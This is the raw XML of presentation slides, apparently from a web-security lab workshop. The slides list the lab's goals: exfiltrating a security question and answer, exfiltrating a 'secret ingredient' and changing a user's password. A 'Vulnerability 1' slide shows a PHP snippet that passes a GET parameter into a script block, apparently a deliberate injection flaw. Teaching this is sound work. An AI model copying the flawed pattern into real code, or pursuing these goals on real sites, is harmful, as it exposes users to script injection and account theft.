              <a:schemeClr val="tx2">
                <a:lumMod val="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descr="A hand holding a stopwatch&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C084DC04-F4D8-F041-EC01-19AB2ECB2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53444" y="21023"/>
            <a:ext cx="1238556" cy="1250539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35543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Why Dress Code?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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and reaching out to the ground&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79954ED6-B763-4A91-001A-B5BD0392FA84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="1616" r="11373"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60752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71FF-337F-8EFD-D9B0-438CD438051D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>To Be Published</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA4E57BC-1254-293E-391D-C0C0B9BB0144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11616" y="0"/>
            <a:ext cx="12168768" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B190193-8A95-D572-90DB-F81B50EDD1ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11616" y="0"/>
            <a:ext cx="12168768" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="91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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13022ED-E0B6-0436-39BA-2311E44F9C0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2967335"/>
            <a:ext cx="10515600" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="6000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://sensepost.com/blog/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="6000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1325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30">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596DC17F-2E4A-5C6F-C5B4-54E8FE2F0C8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="3952" r="2" b="2"/>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9" name="Picture 8" descr="A chicken standing on a wood deck&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4862191-8512-BA09-7561-64282EF5B3C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="14551" r="-2" b="-2"/>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screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0517FE18-17F6-E505-FA5F-660150EF9D61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="12763" r="-1" b="25016"/>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6" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7674CB38-CE73-FEDF-B0CD-003240695E0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6338699" y="4303291"/>
            <a:ext cx="5505814" cy="15769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kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Laboratory Environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2257627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51BEFF-4FFE-C07E-328F-D8B426FF8ACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828673" y="3928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7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Laboratory Objectives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB62E7CC-7B76-B4A3-2081-CED04FC2A094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510986" y="1529341"/>
            <a:ext cx="11170023" cy="4339650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4600" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>To exfiltrate the security question and answer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="4600" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4600" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>To exfiltrate the secret ingredient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="4600" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>change user password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1656534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51BEFF-4FFE-C07E-328F-D8B426FF8ACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828673" y="3928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7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB62E7CC-7B76-B4A3-2081-CED04FC2A094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510986" y="1448428"/>
            <a:ext cx="11170023" cy="5016758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>secret.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_GET</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>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r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>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errorMsg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Error 1005: "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_GET</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>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r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>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r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>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errorMsg</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a:t>
            </a:r>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endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// […]</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>defer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nonce</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_SERVER</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'CSP_NONCE'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>displayError</a:t>
            </a:r>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r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getElementById</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'error-div'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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innerText</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
